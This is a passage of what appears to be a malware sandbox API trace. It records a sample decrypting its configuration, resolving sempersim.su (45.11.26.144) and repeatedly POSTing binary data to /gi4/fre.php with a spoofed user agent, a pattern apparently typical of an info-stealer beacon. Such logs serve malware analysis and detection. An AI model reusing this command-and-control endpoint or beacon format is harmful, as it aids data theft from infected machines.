param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0218.730] GetProcessHeap () returned 0x5b0000 [0218.730] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0218.730] GetProcessHeap () returned 0x5b0000 [0218.731] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0218.731] send (s=0x334, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0218.732] send (s=0x334, buf=0x5d1e18*, len=159, flags=0) returned 159 [0218.732] GetProcessHeap () returned 0x5b0000 [0218.733] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0218.733] recv (in: s=0x334, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0220.183] GetProcessHeap () returned 0x5b0000 [0220.184] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0220.184] GetProcessHeap () returned 0x5b0000 [0220.184] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0220.184] GetProcessHeap () returned 0x5b0000 [0220.185] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0220.185] GetProcessHeap () returned 0x5b0000 [0220.185] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0220.185] closesocket (s=0x334) returned 0 [0220.186] GetProcessHeap () returned 0x5b0000 [0220.186] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8d0 | out: hHeap=0x5b0000) returned 1 [0220.186] GetProcessHeap () returned 0x5b0000 [0220.187] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0220.187] GetProcessHeap () returned 0x5b0000 [0220.187] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d34b8 | out: hHeap=0x5b0000) returned 1 [0220.187] GetProcessHeap () returned 0x5b0000 [0220.187] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0220.188] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x12a8) returned 0x334 [0220.189] Sleep (dwMilliseconds=0xea60) [0220.202] GetProcessHeap () returned 0x5b0000 [0220.202] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3500 [0220.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0220.203] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0220.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0220.211] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0220.223] GetProcessHeap () returned 0x5b0000 [0220.223] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0220.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0220.224] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0220.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0220.225] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0220.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0220.226] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0220.226] GetProcessHeap () returned 0x5b0000 [0220.227] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0220.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0220.228] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3500, pdwDataLen=0xdfcfc | out: pbData=0x5d3500, pdwDataLen=0xdfcfc) returned 1 [0220.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0220.229] CryptDestroyKey (hKey=0x5be048) returned 1 [0220.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0220.230] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0220.230] GetProcessHeap () returned 0x5b0000 [0220.230] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0220.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0220.231] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0220.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0220.232] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0220.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0220.233] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0220.238] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0220.238] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0220.238] GetProcessHeap () returned 0x5b0000 [0220.238] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0220.238] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0220.239] GetProcessHeap () returned 0x5b0000 [0220.239] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0220.239] GetProcessHeap () returned 0x5b0000 [0220.240] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0220.240] GetProcessHeap () returned 0x5b0000 [0220.240] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3500 | out: hHeap=0x5b0000) returned 1 [0220.240] GetProcessHeap () returned 0x5b0000 [0220.240] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3668 [0220.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0220.241] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0220.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0220.247] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5e60) returned 1 [0220.258] GetProcessHeap () returned 0x5b0000 [0220.258] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0220.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0220.259] CryptImportKey (in: hProv=0x5c5e60, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0220.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0220.260] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0220.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0220.261] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0220.261] GetProcessHeap () returned 0x5b0000 [0220.262] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0220.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0220.263] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3668, pdwDataLen=0xdfcfc | out: pbData=0x5d3668, pdwDataLen=0xdfcfc) returned 1 [0220.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0220.264] CryptDestroyKey (hKey=0x5bde08) returned 1 [0220.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0220.268] CryptReleaseContext (hProv=0x5c5e60, dwFlags=0x0) returned 1 [0220.268] GetProcessHeap () returned 0x5b0000 [0220.268] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d54c0 [0220.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0220.269] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0220.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0220.271] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0220.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0220.272] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0220.272] GetProcessHeap () returned 0x5b0000 [0220.272] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0220.272] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cde58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0220.275] GetProcessHeap () returned 0x5b0000 [0220.275] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9b0 [0220.275] socket (af=2, type=1, protocol=6) returned 0x338 [0220.276] connect (s=0x338, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0220.351] FreeAddrInfoW (pAddrInfo=0x5cde58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0220.351] GetProcessHeap () returned 0x5b0000 [0220.351] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5aa8 [0220.351] GetProcessHeap () returned 0x5b0000 [0220.352] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0220.353] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0220.354] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0220.354] GetProcessHeap () returned 0x5b0000 [0220.354] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0220.354] GetProcessHeap () returned 0x5b0000 [0220.355] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0220.355] GetProcessHeap () returned 0x5b0000 [0220.355] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2e40 [0220.355] GetProcessHeap () returned 0x5b0000 [0220.355] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0220.356] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0220.357] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0220.357] GetProcessHeap () returned 0x5b0000 [0220.357] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0220.357] GetProcessHeap () returned 0x5b0000 [0220.357] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0220.357] send (s=0x338, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0220.358] send (s=0x338, buf=0x5d1e18*, len=159, flags=0) returned 159 [0220.358] GetProcessHeap () returned 0x5b0000 [0220.358] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0220.358] recv (in: s=0x338, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0221.226] GetProcessHeap () returned 0x5b0000 [0221.226] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0221.226] GetProcessHeap () returned 0x5b0000 [0221.227] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0221.227] GetProcessHeap () returned 0x5b0000 [0221.227] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0221.227] GetProcessHeap () returned 0x5b0000 [0221.228] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5aa8 | out: hHeap=0x5b0000) returned 1 [0221.228] closesocket (s=0x338) returned 0 [0221.228] GetProcessHeap () returned 0x5b0000 [0221.228] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9b0 | out: hHeap=0x5b0000) returned 1 [0221.229] GetProcessHeap () returned 0x5b0000 [0221.229] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d54c0 | out: hHeap=0x5b0000) returned 1 [0221.229] GetProcessHeap () returned 0x5b0000 [0221.229] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3668 | out: hHeap=0x5b0000) returned 1 [0221.229] GetProcessHeap () returned 0x5b0000 [0221.229] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0221.229] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x12a4) returned 0x338 [0221.231] Sleep (dwMilliseconds=0xea60) [0221.234] GetProcessHeap () returned 0x5b0000 [0221.234] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3470 [0221.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0221.235] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0221.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0221.241] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0221.252] GetProcessHeap () returned 0x5b0000 [0221.252] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84d0 [0221.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0221.253] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c84d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0221.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0221.254] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0221.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0221.255] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.255] GetProcessHeap () returned 0x5b0000 [0221.256] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84d0 | out: hHeap=0x5b0000) returned 1 [0221.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0221.257] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3470, pdwDataLen=0xdfcfc | out: pbData=0x5d3470, pdwDataLen=0xdfcfc) returned 1 [0221.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0221.258] CryptDestroyKey (hKey=0x5bde08) returned 1 [0221.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0221.259] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0221.259] GetProcessHeap () returned 0x5b0000 [0221.259] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5070 [0221.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0221.260] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0221.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0221.261] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0221.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0221.262] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0221.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0221.263] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0221.263] GetProcessHeap () returned 0x5b0000 [0221.263] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0221.263] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0221.264] GetProcessHeap () returned 0x5b0000 [0221.264] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0221.264] GetProcessHeap () returned 0x5b0000 [0221.265] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5070 | out: hHeap=0x5b0000) returned 1 [0221.271] GetProcessHeap () returned 0x5b0000 [0221.272] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3470 | out: hHeap=0x5b0000) returned 1 [0221.272] GetProcessHeap () returned 0x5b0000 [0221.272] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3158 [0221.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0221.274] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0221.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0221.280] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0221.288] GetProcessHeap () returned 0x5b0000 [0221.288] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0221.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0221.289] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0221.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0221.290] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0221.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0221.291] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.291] GetProcessHeap () returned 0x5b0000 [0221.292] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0221.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0221.292] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3158, pdwDataLen=0xdfcfc | out: pbData=0x5d3158, pdwDataLen=0xdfcfc) returned 1 [0221.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0221.293] CryptDestroyKey (hKey=0x5be048) returned 1 [0221.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0221.294] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0221.294] GetProcessHeap () returned 0x5b0000 [0221.294] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d56e8 [0221.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0221.295] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0221.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0221.296] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0221.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0221.300] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0221.300] GetProcessHeap () returned 0x5b0000 [0221.300] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0221.300] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce0d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0221.301] GetProcessHeap () returned 0x5b0000 [0221.301] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8d0 [0221.301] socket (af=2, type=1, protocol=6) returned 0x33c [0221.302] connect (s=0x33c, name=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0221.375] FreeAddrInfoW (pAddrInfo=0x5ce0d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0221.375] GetProcessHeap () returned 0x5b0000 [0221.375] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0221.375] GetProcessHeap () returned 0x5b0000 [0221.375] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0221.376] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0221.377] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0221.377] GetProcessHeap () returned 0x5b0000 [0221.377] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0221.377] GetProcessHeap () returned 0x5b0000 [0221.378] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0221.378] GetProcessHeap () returned 0x5b0000 [0221.378] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2e40 [0221.378] GetProcessHeap () returned 0x5b0000 [0221.378] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0221.379] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0221.379] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0221.379] GetProcessHeap () returned 0x5b0000 [0221.380] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0221.380] GetProcessHeap () returned 0x5b0000 [0221.380] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0221.380] send (s=0x33c, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0221.381] send (s=0x33c, buf=0x5d1e18*, len=159, flags=0) returned 159 [0221.381] 